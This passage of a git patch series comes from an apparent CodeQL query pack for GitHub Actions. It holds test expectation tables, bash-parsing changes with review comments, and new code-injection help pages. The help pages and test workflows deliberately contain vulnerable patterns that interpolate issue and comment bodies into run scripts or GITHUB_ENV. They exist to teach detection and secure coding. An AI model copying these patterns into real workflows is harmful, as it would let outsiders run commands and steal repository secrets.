$GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| 
.github/workflows/multiline2.yml:52:15:52:23 | heredoc22 | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:58:15:58:23 | heredoc23 | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:63:15:63:19 | line1 | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| 
.github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:1:1:89:35 | on: | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | +| .github/workflows/multiline2.yml:66:15:66:24 | multiline1 | .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| 
.github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE< event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e 
"$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | 
@@ -928,6 +1158,38 @@ nodeLocations | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | .github/workflows/multiline2.yml:9:5:89:35 | .github/workflows/multiline2.yml@9:5:89:35 | +| .github/workflows/multiline2.yml:11:9:15:6 | Run Step | .github/workflows/multiline2.yml:11:9:15:6 | .github/workflows/multiline2.yml@11:9:15:6 | +| .github/workflows/multiline2.yml:11:14:14:54 | echo "changelog< event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline2.yml:30:14:33:14 | .github/workflows/multiline2.yml@30:14:33:14 | +| .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline2.yml:32:13:32:39 | .github/workflows/multiline2.yml@32:13:32:39 | +| .github/workflows/multiline2.yml:34:9:40:6 | Run Step | .github/workflows/multiline2.yml:34:9:40:6 | .github/workflows/multiline2.yml@34:9:40:6 | +| .github/workflows/multiline2.yml:35:14:39:14 | cat \| tee -a $GITHUB_ENV << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:35:14:39:14 | .github/workflows/multiline2.yml@35:14:39:14 | +| .github/workflows/multiline2.yml:40:9:46:6 | Run Step | .github/workflows/multiline2.yml:40:9:46:6 | .github/workflows/multiline2.yml@40:9:46:6 | +| .github/workflows/multiline2.yml:41:14:45:14 | cat > issue.txt << EOL\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:41:14:45:14 | 
.github/workflows/multiline2.yml@41:14:45:14 | +| .github/workflows/multiline2.yml:46:9:52:6 | Run Step | .github/workflows/multiline2.yml:46:9:52:6 | .github/workflows/multiline2.yml@46:9:52:6 | +| .github/workflows/multiline2.yml:47:14:51:14 | cat << EOL \| tee -a $GITHUB_ENV\n${ISSUE_BODY}\nFOO\nEOL\n | .github/workflows/multiline2.yml:47:14:51:14 | .github/workflows/multiline2.yml@47:14:51:14 | +| .github/workflows/multiline2.yml:52:9:58:6 | Run Step | .github/workflows/multiline2.yml:52:9:58:6 | .github/workflows/multiline2.yml@52:9:58:6 | +| .github/workflows/multiline2.yml:53:14:57:14 | cat < file.txt\nHello\nWorld\nEOF\n | .github/workflows/multiline2.yml:53:14:57:14 | .github/workflows/multiline2.yml@53:14:57:14 | +| .github/workflows/multiline2.yml:58:9:63:6 | Run Step | .github/workflows/multiline2.yml:58:9:63:6 | .github/workflows/multiline2.yml@58:9:63:6 | +| .github/workflows/multiline2.yml:59:14:62:14 | cat <<-EOF \| tee -a "$GITHUB_ENV"\necho "FOO=$TITLE"\nEOF\n | .github/workflows/multiline2.yml:59:14:62:14 | .github/workflows/multiline2.yml@59:14:62:14 | +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | .github/workflows/multiline2.yml:63:9:66:6 | .github/workflows/multiline2.yml@63:9:66:6 | +| .github/workflows/multiline2.yml:64:14:65:142 | echo REPO_NAME=$(cat issue.txt \| sed 's/\\\\r/\\\\n/g' \| grep -ioE '\\\\s*[a-z0-9_-]+/[a-z0-9_-]+\\\\s*$' \| tr -d ' ') \| tee -a $GITHUB_ENV\n | .github/workflows/multiline2.yml:64:14:65:142 | .github/workflows/multiline2.yml@64:14:65:142 | +| .github/workflows/multiline2.yml:66:9:71:6 | Run Step | .github/workflows/multiline2.yml:66:9:71:6 | .github/workflows/multiline2.yml@66:9:71:6 | +| .github/workflows/multiline2.yml:67:14:70:42 | echo "PR_TITLE<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | 
@@ -1042,6 +1304,7 @@ nodeLocations | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -1221,8 +1484,6 @@ writeToGitHubEnv | VAR1 | $TITLE | VAR1<> $GITHUB_ENV) | VAR3<> $GITHUB_ENV)\nEOF | -| VAR4 | ${ISSUE_BODY1} | VAR4=${ISSUE_BODY1} | -| VAR5 | Hello\nWorld | VAR5< Date: Thu, 1 Aug 2024 17:49:13 +0200 Subject: [PATCH 445/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- .../Security/CWE-094/CodeInjectionCritical.md | 60 +++++++++++++++++++ .../Security/CWE-094/CodeInjectionMedium.md | 60 +++++++++++++++++++ ql/src/qlpack.yml | 2 +- 4 files changed, 122 insertions(+), 2 deletions(-) create mode 100644 ql/src/Security/CWE-094/CodeInjectionCritical.md create mode 100644 ql/src/Security/CWE-094/CodeInjectionMedium.md diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index dff01f80f2b5..3a09bb016744 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.29 +version: 0.1.30 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.md b/ql/src/Security/CWE-094/CodeInjectionCritical.md new file mode 100644 index 000000000000..9939c88eb19a --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.md 
@@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). 
+- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.md b/ql/src/Security/CWE-094/CodeInjectionMedium.md new file mode 100644 index 000000000000..9939c88eb19a --- /dev/null +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.md 
@@ -0,0 +1,60 @@ +# Code Injection in GitHub Actions + +Using user-controlled input in GitHub Actions may lead to code injection in contexts like _run:_ or _script:_. + +Code injection in GitHub Actions may allow an attacker to exfiltrate any secrets used in the workflow and the temporary GitHub repository authorization token. The token might have write access to the repository, allowing an attacker to use the token to make changes to the repository. + +## Recommendation + +The best practice to avoid code injection vulnerabilities in GitHub workflows is to set the untrusted input value of the expression to an intermediate environment variable and then use the environment variable using the native syntax of the shell/script interpreter (that is, not _${{ env.VAR }}_). + +It is also recommended to limit the permissions of any tokens used by a workflow such as the GITHUB_TOKEN. + +## Example + +The following example lets a user inject an arbitrary shell command: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - run: | + echo '${{ github.event.comment.body }}' +``` + +The following example uses an environment variable, but **still allows the injection** because of the use of expression syntax: + +```yaml +on: issue_comment + +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo '${{ env.BODY }}' +``` + +The following example uses shell syntax to read the environment variable and will prevent the attack: + +```yaml +jobs: + echo-body: + runs-on: ubuntu-latest + steps: + - env: + BODY: ${{ github.event.issue.body }} + run: | + echo "$BODY" +``` + +## References + +- GitHub Security Lab Research: [Keeping your GitHub Actions and workflows secure: Untrusted input](https://securitylab.github.com/research/github-actions-untrusted-input). 
+- GitHub Docs: [Security hardening for GitHub Actions](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions). +- GitHub Docs: [Permissions for the GITHUB_TOKEN](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token). diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 1070a8e9a977..b89b197da04b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.29 +version: 0.1.30 groups: [actions, queries] suites: codeql-suites extractor: javascript From 41fade5feb30339cf8d453e7eb1cc0b1c7c57e7b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 2 Aug 2024 12:44:43 +0200 Subject: [PATCH 446/707] feat(bash): Improve bash command parsing --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- ql/lib/codeql/actions/config/Config.qll | 2 +- .../.github/workflows/poisonable_steps.yml | 5 + .../library-tests/poisonable_steps.expected | 2 +- ql/test/library-tests/test.expected | 254 ++++++++++-------- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 8 + .../CWE-094/ArgumentInjectionMedium.expected | 5 + 8 files changed, 167 insertions(+), 123 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e05e3a8c41cb..5bb94ba8a68c 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1243,7 +1243,7 @@ class RunImpl extends StepImpl { RunImpl() { this.getNode().lookup("run") = script } - string getScript() { result = script.getValue() } + string getScript() { result = script.getValue().regexpReplaceAll("\\\\\\s*\n", "") } ScalarValueImpl getScriptScalar() { result = TScalarValueNode(script) } diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index fb1ae9af14db..e298865c468f 100644 
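Review bot: `getScript()` now joins backslash-continued lines for every `run:` script, but the pattern `\\\\\\s*\n` is looser than the shell rule it models: in bash a backslash followed by trailing whitespace before the newline is an escaped space, not a continuation, and a line ending in an escaped backslash (`\\\\`) is also joined here; the replacement is applied regardless of the step's `shell:`, which cannot be seen from this hunk. If the leniency is deliberate, record it above the method, e.g. `// Join backslash-newline continuations so a wrapped command is parsed as one line; tolerant of trailing whitespace after the backslash`. Also note that the returned text no longer has the scalar's line structure, so any column offsets derived from `getScript()` and then mapped onto `getScriptScalar()` locations may drift — worth a sentence in the same comment if callers do that.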
--- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -92,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp // + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index fad7001ad5a9..2e971baa050f 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -39,3 +39,8 @@ jobs: - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo - run: ./foo/cmd + - run: | + sed -e 's##TITLE#' \ + -e 's##${{ env.sot_repo }}#' \ + -e 's##${TITLE}#' \ + .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index b164d16b6035..0cd71f96ea91 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -30,4 +30,4 @@ | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index dfdd843d8a3c..6bedcadcdbab 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
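Review bot: The new `regexp` line in `argumentInjectionSinksDataModel` carries the old tail as a commented-out expression (`// + commandSuffixDelimiter() + ".*"`), which reads like an unfinished edit rather than a decision; either delete it or replace it with a why-comment such as `// no suffix delimiter: the sink pattern itself decides where the argument list ends`. Because CodeQL's `regexpMatch`/`regexpCapture` match the whole string, dropping the trailing `.*` means each `sub_regexp` supplied by the extension data model must now consume the rest of the script on its own; that only holds if every such pattern already ends in a `.*`-like tail, which this hunk cannot show, so it would be good to state that contract where the data model is documented.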
@@ -8,7 +8,7 @@ workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline2.yml:1:1:89:35 | on: | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions @@ -16,14 +16,14 @@ jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline2.yml:9:5:89:35 | Job: Test | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -94,7 +94,8 @@ steps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | 
@@ -167,7 +168,8 @@ runSteps | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | sed -e 's##TITLE#' -e 's##${{ env.sot_repo }}#' -e 's##${TITLE}#' .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | 
@@ -185,6 +187,7 @@ runExprs | .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | | .github/workflows/multiline2.yml:30:9:34:6 | Run Step | .github/workflows/multiline2.yml:32:13:32:39 | toJson(github.event) | | .github/workflows/multiline.yml:30:9:34:6 | Run Step | .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
@@ -287,7 +290,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | -| .github/workflows/poisonable_steps.yml:41:9:41:23 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | +| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | 
@@ -542,142 +546,147 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:41:23 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:41:23 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:41:23 